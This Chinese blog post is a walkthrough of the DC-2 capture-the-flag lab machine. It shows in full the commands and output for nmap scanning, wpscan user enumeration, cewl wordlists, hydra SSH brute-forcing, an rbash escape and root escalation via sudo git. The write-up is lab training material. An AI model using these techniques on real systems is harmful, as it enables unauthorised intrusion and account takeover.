DC-2靶机渗透实操全过程,一起来玩吧!
时间:2022-07-22
本文章向大家介绍DC-2靶机渗透实操全过程,一起来玩吧!,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
靶机介绍
这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。靶机下载地址:http://www.five86.com/dc-2.html
信息搜集
直接上nmap进行扫描
nmap -sV -A 172.16.0.12
Nmap scan report for localhost (172.16.0.12)
Host is up (0.0011s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:B7:BA:FE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 1.07 ms localhost (172.16.0.12)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.58 seconds
发现开了80端口却无法访问,是重定向到dc-2域名,可改hosts文件访问,添加ip对应域名
win10路径:C:WindowsSystem32driversetchosts
linux路径:etc/hosts
渗透实战
- 查看页面为wordpress的cms且页面有flag提示
- 用cewl来做字典
- 且登录进去才有可以拿到下一个flag
- 果断用wpscan列出用户
wpscan --url http://dc-2 -e u
admin
tom
jerry
- 用cewl生成字典
cewl http://dc-2 -w passwds.txt
- 用wpscan进行用户爆破
wpscan --url http://dc-2 -U users.txt -P passwds.tx
[i] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
- 通过jerry用户登录后台发现flag2,提示走别的切入点
- 再扫描一下端口发现7744 ssh服务
nmap -sV -p- dc-2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-04 20:36 CST
Nmap scan report for dc-2 (172.16.0.12)
Host is up (0.00047s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
MAC Address: 00:0C:29:B7:BA:FE (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.01 seconds
- 尝试hydra爆破ssh
hydra -L users.txt -P passwds.txt dc-2 -s 7744 ssh -vV
[7744][ssh] host: dc-2 login: tom password: parturient
- 登录ssh
ssh tom@dc-2 -p 7744
tom@DC-2:~$ whoami
-rbash: whoami: command not found
tom@DC-2:~$ pwd
/home/tom
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
- 发现是一个受限的bash,直接rbash绕过获取到flag3.txt内容
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a # 赋值给a
$ export PATH=$PATH:/bin/ # 导入环境变量
$ export PATH=$PATH:/usr/bin
$ ls
flag3.txt usr
$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
- 提示su切换jerry,使用之前后台爆破出来的密码成功登录
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
- 提示最终的home,应该是要提权了,且是利用git
find / -perm -u=s -type f 2>/dev/null 发现没有find和git命令,通过sudo查看发现jerry用户无需root密码可以执行git sudo -l
jerry@DC-2:/home$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
- git提权
sudo git -p help # -p强制进入交互模式
!/bin/sh
- 直接root权限获取最终finalflag
ls
final-flag.txt
# cat final-flag.txt
__ __ _ _ _ _
/ / / ___| | | __| | ___ _ __ ___ /
/ / / _ | | / _` |/ _ | '_ / _ / /
/ / __/ | | | (_| | (_) | | | | __/_/
/ / ___|_|_| __,_|___/|_| |_|___/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
- WordPress RSS Feed 优化/设置技巧六则
- SourceTree 基本介绍
- 学习Altas 笔记[JS简单调用服务端方法]
- 使用WinSCP软件在windows和Linux中进行文件传输
- 线程安全的Generic Dictionary
- Python 项目实践三(Web应用程序)第五篇
- CentOS 6.3下 安装 Mono 3.2 和Jexus 5.4
- Python 项目实践三(Web应用程序)第四篇
- 负载均衡环境下缓存处理
- WordPress Ajax 异步加载 自定义评论表情
- “分期网”域名fenqi.wang以16888元成交
- Python 项目实践三(Web应用程序) 第三篇
- Python 项目实践三(Web应用程序)第二篇
- 第一个IronPython程序(之一)
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法